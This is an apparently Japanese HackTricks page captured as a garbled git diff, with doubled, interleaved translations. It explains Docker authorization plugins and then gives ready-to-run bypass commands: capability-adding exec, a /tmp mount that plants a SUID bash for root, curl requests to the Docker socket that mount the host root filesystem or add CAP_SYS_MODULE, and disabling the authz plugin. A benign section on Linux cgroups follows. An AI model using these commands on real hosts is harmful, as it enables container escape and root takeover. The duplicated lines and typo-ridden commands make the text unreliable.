**Dockerの**デフォルトの**認可**モデルは**すべてまたは何も**です。Dockerデーモンにアクセス権限を持つ任意のユーザーは**任意の**Dockerクライアント**コマンド**を実行できます。DockerのEngine APIを使用してデーモンに連絡する呼び出し元にも同じことが当てはまります。より**細かいアクセス制御**が必要な場合、**認可プラグイン**を作成してDockerデーモン構成に追加できます。認可プラグインを使用すると、Docker管理者はDockerデーモンへのアクセスを管理するための**細かいアクセス**ポリシーを構成できます。
# 基本アーキテクチャ
# 基本的なアーキテクチャ
Docker認可プラグインは、Dockerデーモンに対して要求された**アクション**を**許可/拒否**するために使用できる**外部**の**プラグイン**です。これは、要求した**ユーザー**と要求された**アクション**に**応じて**変わります。
Docker Authプラグインは**外部**の**プラグイン**であり、Dockerデーモンに要求された**アクション**に**依存**して、要求された**ユーザー**に**許可/拒否**することができます。
CLI経由またはEngine APIを介してDocker**デーモン**に対して**HTTP** **リクエスト**が行われると、**認証**サブシステムがリクエストをインストールされた**認証** **プラグイン**に**渡します**。リクエストにはユーザー(呼び出し元)とコマンドコンテキストが含まれています。**プラグイン**はリクエストを**許可**するか**拒否**するかを決定する責任があります。
**[以下の情報はドキュメントから取得](https://docs.docker.com/engine/extend/plugins_authorization/#:~:text=If%20you%20require%20greater%20access,access%20to%20the%20Docker%20daemon)**
以下のシーケンス図は、許可と拒否の認可フローを示しています:
CLIを介してまたはEngine APIを介してDockerデーモンに**HTTP** **リクエスト**が行われると、**認証** **サブシステム**はインストールされた**認証** **プラグイン**にリクエストを渡します。リクエストにはユーザー(呼び出し元)とコマンドコンテキストが含まれます。**プラグイン**はリクエストを**許可**または**拒否**する責任があります。
![Authorization Allow flow](https://docs.docker.com/engine/extend/images/authz_allow.png)
以下のシーケンス図は許可および拒否の認可フローを示しています:
![Authorization Deny flow](https://docs.docker.com/engine/extend/images/authz_deny.png)
![Authorization Allow flow](https://docs.docker.com/engine/extend/images/authz\_allow.png)
プラグインに送信される各リクエストには、認証されたユーザー、HTTPヘッダー、およびリクエスト/レスポンスボディが**含まれています**。**ユーザー名**と使用された**認証方法**のみがプラグインに渡されます。最も重要なことは、ユーザーの**資格情報**やトークンは渡され**ない**ということです。最後に、**すべてのリクエスト/レスポンスボディが認可プラグインに送信されるわけではありません**。`Content-Type`が`text/*`または`application/json`の場合にのみ、リクエスト/レスポンスボディが送信されます。
![Authorization Deny flow](https://docs.docker.com/engine/extend/images/authz\_deny.png)
HTTP接続をハイジャックする可能性があるコマンド`HTTP Upgrade`)については、`exec`のようなコマンドでは、認可プラグインは初期のHTTPリクエストに対してのみ呼び出されます。プラグインがコマンドを承認すると、残りのフローに対しては認可が適用されません。具体的には、ストリーミングデータは認可プラグインに渡されません。`logs`や`events`のようにチャンク化されたHTTPレスポンスを返すコマンドについては、HTTPリクエストのみが認可プラグインに送信されます。
プラグインに送信される各リクエストには、認証されたユーザー、HTTPヘッダー、およびリクエスト/レスポンスボディが含まれます。プラグインに渡されるのは**ユーザー名**と使用された**認証方法**だけです。最も重要なのは、ユーザーの**資格情報**やトークンは渡されないことです。最後に、認可プラグインに送信されるのは**すべてのリクエスト/レスポンスボディではなく**、`Content-Type`が`text/*`または`application/json`であるリクエスト/レスポンスボディのみです。
リクエスト/レスポンスの処理中に、一部の認可フローではDockerデーモンに対して追加のクエリを実行する必要があるかもしれません。このようなフローを完了するために、プラグインは通常のユーザーと同様にデーモンAPIを呼び出すことができます。これらの追加のクエリを有効にするために、プラグインは管理者が適切な認証およびセキュリティポリシーを設定する手段を提供する必要があります。
HTTP接続を乗っ取る可能性のあるコマンド`HTTP Upgrade`など)に対して、`exec`のようなHTTP接続を乗っ取る可能性のあるコマンドに対しては、認可プラグインは最初のHTTPリクエストのみに対して呼び出されます。プラグインがコマンドを承認すると、残りのフローには認可が適用されません。具体的には、ストリーミングデータは認可プラグインに渡されません。`logs`や`events`などのチャンク化されたHTTPレスポンスを返すコマンドに対しては、HTTPリクエストのみが認可プラグインに送信されます。
リクエスト/レスポンス処理中、一部の認可フローではDockerデーモンへの追加のクエリが必要になる場合があります。このようなフローを完了するために、プラグインは通常のユーザーと同様にデーモンAPIを呼び出すことができます。これらの追加のクエリを有効にするには、プラグインは管理者が適切な認証およびセキュリティポリシーを構成できる手段を提供する必要があります。
## 複数のプラグイン
Dockerデーモンの**起動**の一部として**プラグイン**を**登録**する責任があります。**複数のプラグインをインストールし、それらを連鎖させる**ことができます。このチェーンは順序付けられることがあります。デーモンへの各リクエストは、順番にチェーンを通過します。**すべてのプラグインがリソースへのアクセスを許可した場合にのみ**、アクセスが許可されます。
Dockerデーモンの**起動**時に**プラグイン**を**登録**する責任があります。**複数のプラグインをインストールして連結**することができます。このチェーンは順序付けられることがあります。デーモンへの各リクエストは、チェーンを通過して順番に処理されます。リソースへのアクセスがすべてのプラグインによって許可された場合のみ、アクセスが許可されます。
# プラグインの例
## Twistlock AuthZ Broker
プラグイン[**authz**](https://github.com/twistlock/authz)を使用すると、**プラグイン**がリクエストを認可するために**読み取る**簡単な**JSON**ファイルを作成できます。したがって、どのAPIエンドポイントが各ユーザーに到達できるかを非常に簡単に制御する機会を提供します。
プラグイン[**authz**](https://github.com/twistlock/authz)を使用すると、**JSON**ファイルを作成して**リクエストを認可**するために**プラグイン**が**読み取る**ことができます。したがって、各ユーザーがどのAPIエンドポイントに到達できるかを非常に簡単に制御できます。
これは、AliceとBobが新しいコンテナを作成できる例です`{"name":"policy_3","users":["alice","bob"],"actions":["container_create"]}`
以下は、AliceとBobが新しいコンテナを作成できるようにする例です:`{"name":"policy_3","users":["alice","bob"],"actions":["container_create"]}`
ページ[route_parser.go](https://github.com/twistlock/authz/blob/master/core/route_parser.go)では、要求されたURLとアクションの関係を見つけることができます。ページ[types.go](https://github.com/twistlock/authz/blob/master/core/types.go)では、アクション名とアクションの関係を見つけることができます。
[route\_parser.go](https://github.com/twistlock/authz/blob/master/core/route\_parser.go)ページでは、要求されたURLとアクションの関係を見つけることができます。[types.go](https://github.com/twistlock/authz/blob/master/core/types.go)ページでは、アクション名とアクションの関係を見つけることができます。
## シンプルなプラグインチュートリアル
インストールとデバッグに関する詳細情報を含む、**理解しやすいプラグイン**をこちらで見つけることができます:[**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot)
インストールとデバッグに関する詳細な情報が記載されている**理解しやすいプラグイン**をこちらで見つけることができます:[**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot)
`README`と`plugin.go`のコードを読んで、それがどのように機能しているかを理解してください。
動作方法を理解するには、`README`と`plugin.go`のコードを読んでください。
# Docker認可プラグインのバイパス
# Docker Authプラグインのバイパス
## アクセスの列挙
チェックする主なことは、**どのエンドポイントが許可されているか**と**HostConfigのどの値が許可されているか**です。
**許可されているエンドポイント**と**許可されているHostConfigの値**を確認する主なポイントです。
この列挙を実行するには、ツール[**https://github.com/carlospolop/docker_auth_profiler**](https://github.com/carlospolop/docker_auth_profiler)**を使用できます。**
この列挙を実行するには、[**https://github.com/carlospolop/docker\_auth\_profiler**](https://github.com/carlospolop/docker\_auth\_profiler)というツールを使用できます。
## 許可されていない`run --privileged`
## `run --privileged`の不許可
### 最小限の権限
### 最小権限
```bash
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
```
### コンテナを実行してから特権セッションを取得する
### コンテナを実行して特権セッションを取得する
このケースでは、システム管理者は**ボリュームをマウントしたり、コンテナに `--privileged` フラグを使って実行したり、コンテナに追加の権限を与えることを禁止しました**
この場合、システム管理者はユーザーがボリュームをマウントしたり、`--privileged`フラグを使用してコンテナを実行したり、コンテナに追加の権限を付与することを禁止しています。
```bash
docker run -d --privileged modified-ubuntu
docker: Error response from daemon: authorization denied by plugin customauth: [DOCKER FIREWALL] Specified Privileged option value is Disallowed.
See 'docker run --help'.
```
しかし、ユーザーは**実行中のコンテナ内にシェルを作成し、それに追加の権限を与えることができます**
しかし、ユーザーは実行中のコンテナ内でシェルを作成し、追加の特権を与えることができます:
```bash
docker run -d --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu
#bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de
@ -87,11 +89,11 @@ docker exec -it ---cap-add=ALL bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be
# With --cap-add=SYS_ADMIN
docker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash
```
ユーザーは、[**以前に議論した技術**](./#privileged-flag)を使用してコンテナから脱出し、ホスト内で**権限を昇格**することができます。
現在、ユーザーは[**以前に議論されたテクニック**](./#privileged-flag)のいずれかを使用してコンテナから脱出し、ホスト内で特権を**昇格**することができます。
## 書き込み可能フォルダのマウント
## 書き込み可能フォルダのマウント
このケースでは、sysadminはユーザーがコンテナに `--privileged` フラグを使用することや、コンテナに追加の機能を与えることを**禁止**し、`/tmp` フォルダのマウントのみを許可しました:
この場合、システム管理者はユーザーに`--privileged`フラグを使用してコンテナを実行することを禁止し、コンテナに追加の権限を与えることを許可せず、`/tmp`フォルダのみをマウントすることを許可しました。
```bash
host> cp /bin/bash /tmp #Cerate a copy of bash
host> docker run -it -v /tmp:/host ubuntu:18.04 bash #Mount the /tmp folder of the host and get a shell
@ -101,25 +103,25 @@ host> /tmp/bash
-p #This will give you a shell as root
```
{% hint style="info" %}
`/tmp` フォルダをマウントできない場合がありますが、**異なる書き込み可能なフォルダ**をマウントすることができます。書き込み可能なディレクトリを見つけるには、次のコマンドを使用します: `find / -writable -type d 2>/dev/null`
`/tmp`フォルダをマウントできない場合がありますが、**別の書き込み可能なフォルダ**をマウントできます。書き込み可能なディレクトリを見つけるには、`find / -writable -type d 2>/dev/null`を使用できます。
**Linuxマシンのすべてのディレクトリがsuidビットをサポートしているわけではないことに注意してください** suidビットをサポートしているディレクトリを確認するには、`mount | grep -v "nosuid"` を実行します。例えば通常、`/dev/shm`、`/run`、`/proc`、`/sys/fs/cgroup`、`/var/lib/lxcfs` はsuidビットをサポートしていません。
**すべてのLinuxマシンのディレクトリがsuidビットをサポートしているわけではないことに注意してください** suidビットをサポートしているディレクトリを確認するには、`mount | grep -v "nosuid"`を実行します。たとえば、通常、`/dev/shm`、`/run`、`/proc`、`/sys/fs/cgroup`、`/var/lib/lxcfs`はsuidビットをサポートしていません。
また、`/etc` やその他の**設定ファイルを含むフォルダ**を**マウントできる**場合、dockerコンテナからrootとしてそれらを変更し、**ホストで悪用して権限を昇格させる**ことができます(例えば `/etc/shadow` を変更することによって)。
また、**`/etc`をマウント**したり、**構成ファイルを含む他のフォルダ**をマウントできる場合は、それらをdockerコンテナ内でrootとして変更して、ホストで**悪用して特権を昇格**することができます(たとえば、`/etc/shadow`を変更することができます)。
{% endhint %}
## チェックされていないAPIエンドポイント
## 未チェックのAPIエンドポイント
このプラグインを設定するsysadminの責任は、各ユーザーがどのアクションをどの権で実行できるかを制御することです。したがって、管理者がエンドポイントと属性に対して**ブラックリスト**アプローチを取る場合、攻撃者が**権限を昇格させる**ことを可能にする**いくつかのものを忘れる**かもしれません
このプラグインを構成するシスアドの責任は、各ユーザーがどのアクションをどの権で実行できるかを制御することです。したがって、管理者がエンドポイントと属性に**ブラックリスト**アプローチを取る場合、攻撃者が**特権を昇格**させる可能性があるいくつかのエンドポイントを**見落とす**可能性があります
docker APIについては[https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#)で確認できます。
Docker APIは[https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#)で確認できます。
## チェックされていないJSON構造
## 未チェックのJSON構造
### ルートでのバインド
sysadminがdockerファイアウォールを設定した際に、[**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList)の重要なパラメーターの一つである"**Binds**"を**忘れてしまった**可能性があります。\
以下の例では、この設定ミスを悪用して、ホストのルート(/)フォルダをマウントするコンテナを作成し実行することが可能です:
シスアドがDockerファイアウォールを構成する際に、[**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList)の重要なパラメータである「**Binds**」を**見落とした**可能性があります。\
次の例では、この構成ミスを悪用して、ホストのルート(/)フォルダをマウントするコンテナを作成および実行することができます。
```bash
docker version #First, find the API version of docker, 1.40 in this example
docker images #List the images available
@ -130,30 +132,30 @@ docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it
#You can access the host filesystem
```
{% hint style="warning" %}
この例では、JSONのルートレベルキーとして**`Binds`**パラメータを使用していますが、APIでは**`HostConfig`**キーの下に表示されることに注意してください。
この例では、JSONのルートレベルキーとして **`Binds`** パラメータを使用していますが、APIでは **`HostConfig`** キーの下に表示されていることに注意してください。
{% endhint %}
### HostConfig内のBinds
**ルート内のBinds**と同じ手順に従い、Docker APIに対してこの**リクエスト**を実行します
**ルート内のBinds** と同じ手順に従い、Docker APIにこの **リクエスト** を実行してください
```bash
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Binds":["/:/host"]}}' http:/v1.40/containers/create
```
### ルートのマウント
### ルートのマウント
**Binds in root** と同じ手順に従い、Docker APIに対してこの**リクエスト**を実行します:
**ルートでのバインド**と同じ手順に従い、次の**リクエスト**をDocker APIに送信します:
```bash
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}' http:/v1.40/containers/create
```
### HostConfigのマウント
### HostConfigのマウント
**Binds in root** と同じ手順に従い、Docker APIに対してこの**リクエスト**を実行します:
**ルートのバインド**と同じ手順に従い、Docker APIにこの**リクエスト**を実行します:
```bash
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "HostConfig":{"Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}}' http:/v1.40/containers/cre
```
## チェックされていないJSON属性
## 未チェックのJSON属性
sysadminがdockerファイアウォールを設定した際に、[**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList)のパラメーターの重要な属性を**忘れてしまった**可能性があります。例えば、"**HostConfig**"内の"**Capabilities**"がそれにあたります。以下の例では、この設定ミスを悪用して、**SYS\_MODULE**機能を持つコンテナを作成し実行することが可能です:
システム管理者がDockerファイアウォールを設定する際に、[API](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList)の**Capabilities**内の**HostConfig**などの重要な属性を**見落としてしまった**可能性があります。次の例では、この設定ミスを悪用して、**SYS_MODULE**機能を持つコンテナを作成して実行することが可能です。
```bash
docker version
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Capabilities":["CAP_SYS_MODULE"]}}' http:/v1.40/containers/create
@ -164,12 +166,12 @@ capsh --print
#You can abuse the SYS_MODULE capability
```
{% hint style="info" %}
**`HostConfig`** は、コンテナからの脱出に通常含まれる**興味深い** **権限**を持っているキーです。しかし、以前に議論したように、それ以外にBindsを使用することも機能し、制限を回避する可能性があることに注意してください。
**`HostConfig`**は通常、コンテナから脱出するための**興味深い権限**を含んでいるキーです。ただし、以前に議論したように、それ以外のBindsの使用方法によっても制限をバイパスすることができることに注意してください。
{% endhint %}
## プラグインの無効化
もし**システム管理者**がプラグインを**無効にする**機能を**禁止する**のを**忘れていた**場合、それを利用して完全に無効にすることができます!
**システム管理者**が**プラグイン**の**無効化**を**禁止**するのを**忘れて**いた場合、これを利用して完全に無効にすることができます!
```bash
docker plugin list #Enumerate plugins
@ -181,27 +183,10 @@ docker plugin disable authobot
docker run --rm -it --privileged -v /:/host ubuntu bash
docker plugin enable authobot
```
権限昇格後は、**プラグインを再度有効にすることを忘れないでください**。さもなければ、**Dockerサービスの再起動が機能しません**
## Authプラグインバイパスの書き込み
## 著者プラグインバイパスの解説
* [https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/](https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/)
# 参考文献
* [https://docs.docker.com/engine/extend/plugins\_authorization/](https://docs.docker.com/engine/extend/plugins\_authorization/)
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
</details>

102
linux-hardening/privilege-escalation/docker-security/cgroups.md
View file

@ -2,29 +2,29 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **と** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出する**
</details>
## 基本情報
**Linuxコントロールグループ**、またはcgroupsは、プロセスの集合に対して**システムリソース**を**制限**、管理、優先順位付けすることを可能にするLinuxカーネルの機能です。Cgroupsは、システム内のプロセスグループのリソース使用量CPU、メモリ、ディスクI/O、ネットワークなどを**管理し分離する**方法を提供します。これは、特定のプロセスグループに利用可能なリソースを制限したり、特定の種類のワークロードを他から分離したり、異なるプロセスグループ間でシステムリソースの使用を優先順位付けするなど、多くの目的に役立ちます。
**Linux Control Groups**、または **cgroups** は、Linuxカーネルの機能であり、CPU、メモリ、およびディスクI/Oなどのシステムリソースの割り当て、制限、および優先順位付けをプロセスグループ間で可能にします。これらは、プロセスコレクションのリソース使用量を**管理および分離**するメカニズムを提供し、リソース制限、ワークロードの分離、および異なるプロセスグループ間でのリソースの優先順位付けなどの目的に役立ちます。
cgroupsには**バージョン1と2**があり、両方が現在使用されており、システム上で同時に設定することができます。cgroupsバージョン1と**バージョン2**の間の最も**顕著な違い**は、後者がcgroupsの新しい階層的な組織を導入したことであり、グループを親子関係を持つ**ツリー構造**で配置することができます。これにより、異なるプロセスグループ間でリソースの割り当てをより柔軟かつ細かく制御することが可能になります。
**cgroupsには2つのバージョン**があります: バージョン1とバージョン2。両方をシステムで同時に使用できます。主な違いは、**cgroupsバージョン2**が**階層的なツリー構造**を導入し、プロセスグループ間でより微妙で詳細なリソース分配を可能にすることです。さらに、バージョン2には次のようなさまざまな改善点があります:
新しい階層的な組織に加えて、cgroupsバージョン2は**新しいリソースコントローラ**のサポート、レガシーアプリケーションのより良いサポート、パフォーマンスの向上など、**いくつかの他の変更と改善**も導入しました。
新しい階層的な組織に加えて、cgroupsバージョン2は**新しいリソースコントローラ**のサポート、レガシーアプリケーションのより良いサポート、およびパフォーマンスの向上など、**その他の変更と改善**を導入しました。
全体として、cgroupsの**バージョン2はバージョン1よりも多くの機能と優れたパフォーマンスを提供します**が、古いシステムとの互換性が懸念される特定のシナリオでは、バージョン1が引き続き使用される場合があります。
全体として、cgroups **バージョン2は、バージョン1よりも多くの機能と優れたパフォーマンス**を提供しますが、後者は、古いシステムとの互換性が懸念される場合には引き続き使用される可能性があります。
/proc/\<pid>のcgroupファイルを見ることで、任意のプロセスのv1とv2のcgroupsをリストすることができます。次のコマンドでシェルのcgroupsを見てみることから始めることができます
任意のプロセスのv1およびv2 cgroupsをリストするには、そのプロセスのcgroupファイルを /proc/\<pid> で見ることができます。次のコマンドでシェルのcgroupsを確認できます:
```shell-session
$ cat /proc/self/cgroup
12:rdma:/
@ -39,68 +39,52 @@ $ cat /proc/self/cgroup
1:name=systemd:/user.slice/user-1000.slice/session-2.scope
0::/user.slice/user-1000.slice/session-2.scope
```
システムによっては**出力がかなり短い**場合がありますが、これはおそらく**cgroups v2のみを持っている**ことを意味します。ここにある各行の出力は数字で始まり、異なるcgroupです。それを読むためのポインターは以下の通りです
* **数字の212はcgroups v1用です**。それらの**コントローラー**は数字の隣にリストされています。
* **数字の1**も**バージョン1用**ですが、コントローラーはありません。このcgroupは**管理目的**のみのものですこの場合、systemdが設定しました
* 最後の行、**数字の0**は、**cgroups v2用**です。ここにはコントローラーが表示されていません。cgroups v1を持たないシステムでは、これが唯一の出力行になります。
* **名前は階層的で、ファイルパスの一部のように見えます**。この例では、いくつかのcgroupsが/user.sliceと名付けられ、他は/user.slice/user-1000.slice/session-2.scopeと名付けられているのがわかります。
* /testcgroupという名前は、cgroups v1では、プロセスのcgroupsが完全に独立していることを示すために作成されました。
* user.sliceの下にある**名前にsessionが含まれているもの**は、systemdによって割り当てられたログインセッションです。シェルのcgroupsを見ているときにそれらを見るでしょう。**システムサービス**の**cgroups**は**system.sliceの下にあります**。
- **Numbers 212**: cgroups v1、各行が異なるcgroupを表す。これらのコントローラは数字の隣に指定される。
- **Number 1**: cgroups v1でもありますが、管理目的のみsystemdによって設定されるで、コントローラがありません。
- **Number 0**: cgroups v2を表します。コントローラはリストされず、この行はcgroups v2のみを実行しているシステムにのみ存在します。
- **名前は階層的**で、ファイルパスを模しており、異なるcgroup間の構造と関係を示しています。
- **/user.sliceや/system.slice**のような名前は、cgroupの分類を指定し、通常はsystemdによって管理されるログインセッション用のuser.sliceと、システムサービス用のsystem.sliceを示します。
### cgroupsの表示
Cgroupsは通常、**ファイルシステムを通じてアクセスされます**。これは、カーネルと対話するための従来のUnixシステムコールインターフェースとは対照的です。\
シェルのcgroup設定を探るには、`/proc/self/cgroup`ファイルを見てシェルのcgroupを見つけ、次に`/sys/fs/cgroup`(または`/sys/fs/cgroup/unified`)ディレクトリに移動し、**cgroupと同じ名前のディレクトリ**を探します。このディレクトリに移動して周りを見ることで、cgroupの**さまざまな設定とリソース使用情報**を見ることができます。
通常、Unixシステムコールインターフェイスではなく、**cgroups**にアクセスするためにファイルシステムが使用されます。シェルのcgroup構成を調査するには、**/proc/self/cgroup**ファイルを調べる必要があります。これにより、シェルのcgroupが明らかになります。次に、**/sys/fs/cgroup**(または**`/sys/fs/cgroup/unified`**ディレクトリに移動し、cgroupの名前を共有するディレクトリを見つけることで、cgroupに関連するさまざまな設定やリソース使用情報を観察できます。
<figure><img src="../../../.gitbook/assets/image (10) (2) (2).png" alt=""><figcaption></figcaption></figure>
![Cgroup Filesystem](../../../.gitbook/assets/image%20(10)%20(2)%20(2).png)
ここにある多くのファイルの中で、**主要なcgroupインターフェースファイルは`cgroup`で始まります**。`cgroup.procs`catを使っても構いませんから始めてください。これはcgroup内のプロセスをリストします。同様のファイルである`cgroup.threads`にはスレッドも含まれています。
cgroupsの主要なインターフェースファイルは**cgroup**で始まります。**cgroup.procs**ファイルは、catなどの標準コマンドで表示でき、cgroup内のプロセスがリストされます。別のファイルである**cgroup.threads**にはスレッド情報が含まれています。
<figure><img src="../../../.gitbook/assets/image (1) (1) (5).png" alt=""><figcaption></figcaption></figure>
![Cgroup Procs](../../../.gitbook/assets/image%20(1)%20(1)%20(5).png)
シェルに使用されるほとんどのcgroupsには、これらの二つのコントローラーがあり、**使用されるメモリの量**と**cgroup内のプロセスの総数**を制御できます。コントローラーと対話するには、**コントローラーのプレフィックスに一致するファイル**を探します。例えば、cgroup内で実行中のスレッドの数を見たい場合は、pids.currentを参照してください
シェルを管理するcgroupsには通常、メモリ使用量とプロセス数を規制する2つのコントローラが含まれています。コントローラとやり取りするには、コントローラの接頭辞を持つファイルを参照する必要があります。例えば、**pids.current**は、cgroup内のスレッド数を確認するために参照されます。
<figure><img src="../../../.gitbook/assets/image (3) (5).png" alt=""><figcaption></figcaption></figure>
![Cgroup Memory](../../../.gitbook/assets/image%20(3)%20(5).png)
値に**max**が表示されている場合、その値はcgroupに特定の制限がないことを示します。ただし、cgroupsの階層構造のため、制限はディレクトリ階層の下位レベルのcgroupによって課せられる可能性があります。
**maxという値は、このcgroupに特定の制限がないことを意味します**が、cgroupsは階層的であるため、サブディレクトリチェーンを下ったcgroupがそれを制限する可能性があります。
### cgroupsの操作と作成
プロセスをcgroupに入れるには、**rootとしてその`cgroup.procs`ファイルにPIDを書き込みます**
```shell-session
# echo pid > cgroup.procs
プロセスは、**そのプロセスIDPIDを`cgroup.procs`ファイルに書き込むこと**でcgroupsに割り当てられます。これにはroot権限が必要です。たとえば、プロセスを追加するには
```bash
echo [pid] > cgroup.procs
```
```markdown
これがcgroupsの変更がどのように機能するかの一例です。例えば、**cgroupの最大PID数を制限したい**場合例えば、3,000 PIDsに、以下のように行います
同様に、**PID制限の設定など、cgroup属性の変更**は、関連するファイルに希望する値を書き込むことで行われます。cgroupに最大3,000個のPIDを設定するには
```bash
echo 3000 > pids.max
```
```shell-session
# echo 3000 > pids.max
**新しいcgroupsを作成する**には、cgroup階層内に新しいサブディレクトリを作成する必要があります。これにより、カーネルが必要なインターフェースファイルを自動的に生成します。`rmdir`を使用してプロセスがアクティブでないcgroupsを削除できますが、次の制約に注意してください
- **プロセスは、葉cgroupsにのみ配置できます**(つまり、階層内で最も入れ子になっているもの)。
- **親に存在しないコントローラを持つcgroupは存在できません**
- **子cgroupsのコントローラは、`cgroup.subtree_control`ファイルで明示的に宣言する必要があります**。たとえば、子cgroupでCPUおよびPIDコントローラを有効にするには
```bash
echo "+cpu +pids" > cgroup.subtree_control
```
**cgroupsの作成はもっと複雑です**。技術的には、cgroupツリーのどこかにサブディレクトリを作成するのと同じくらい簡単です。そうすると、カーネルが自動的にインターフェースファイルを作成します。プロセスがないcgroupは、インターフェースファイルが存在してもrmdirでcgroupを削除できます。しかし、cgroupsを取り巻く規則には注意が必要です。これには以下のようなものがあります
**ルートcgroup**はこれらのルールの例外であり、直接プロセス配置を許可します。これは、プロセスをsystemdの管理から削除するために使用できます。
* **プロセスは外側のレベル「葉」のcgroupsにのみ配置できます**。例えば、/my-cgroupと/my-cgroup/my-subgroupというcgroupsがある場合、/my-cgroupにはプロセスを配置できませんが、/my-cgroup/my-subgroupは大丈夫です。例外は、cgroupsにコントローラーがない場合ですが、詳しくは触れません。
* cgroupは、**親cgroupにないコントローラーを持つことはできません**。
* 子cgroupsには明示的に**コントローラーを指定する必要があります**。これは`cgroup.subtree_control`ファイルを通じて行います。例えば、子cgroupにcpuとpidsコントローラーを持たせたい場合、このファイルに+cpu +pidsと書き込みます。
cgroup内での**CPU使用率の監視**は、`cpu.stat`ファイルを介して可能であり、消費された合計CPU時間を表示し、サービスのサブプロセス間での使用状況を追跡するのに役立ちます
これらの規則の例外は、階層の最下部にある**ルートcgroup**です。このcgroupには**プロセスを配置できます**。これを行いたい理由の一つは、プロセスをsystemdの制御から切り離すことです。
<figure><img src="../../../.gitbook/assets/image (2) (6) (3).png" alt=""><figcaption>cpu.statファイルに表示されるCPU使用率統計</figcaption></figure>
コントローラーが有効になっていなくても、cgroupのcpu.statファイルを見ることでCPU使用状況を確認できます
<figure><img src="../../../.gitbook/assets/image (2) (6) (3).png" alt=""><figcaption></figcaption></figure>
これはcgroupの全生涯にわたる累積CPU使用量であるため、多くのサブプロセスを生成して最終的に終了するサービスがプロセッサ時間をどのように消費しているかを確認できます。
<details>
